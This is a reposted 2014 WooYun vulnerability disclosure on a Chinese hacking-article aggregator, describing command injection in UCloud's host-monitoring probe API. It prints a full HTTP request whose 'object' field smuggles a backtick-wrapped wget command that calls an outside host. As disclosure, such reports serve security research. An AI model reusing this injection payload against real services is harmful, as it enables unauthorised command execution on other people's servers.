记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华
«zndns某站ST2命令执行...
苏宁某系统弱口令导致getshell... »

ucloud一个有意思的小问题

2014-12-28 12:40

POST /api/monitor/probe HTTP/1.1

Host: uhost.ucloud.cn

User-Agent: NULL

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: https://uhost.ucloud.cn/probe

Content-Length: 152

Cookie:NULL

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache



probe_name=test&object=`wget http://ip/`&probe_frequency=1&retry=+3&group_id%5B10844%5D=on&probe_type=1&use_session=yes&format=json&region_id=5001&zone_id=1

漏洞证明:

ucloud.png

修复方案:

测试充值了50块,给报么?


知识来源: www.wooyun.org/bugs/wooyun-2014-083073

阅读:110226 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“ucloud一个有意思的小问题”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

随机推荐 🤖

标签云 ☁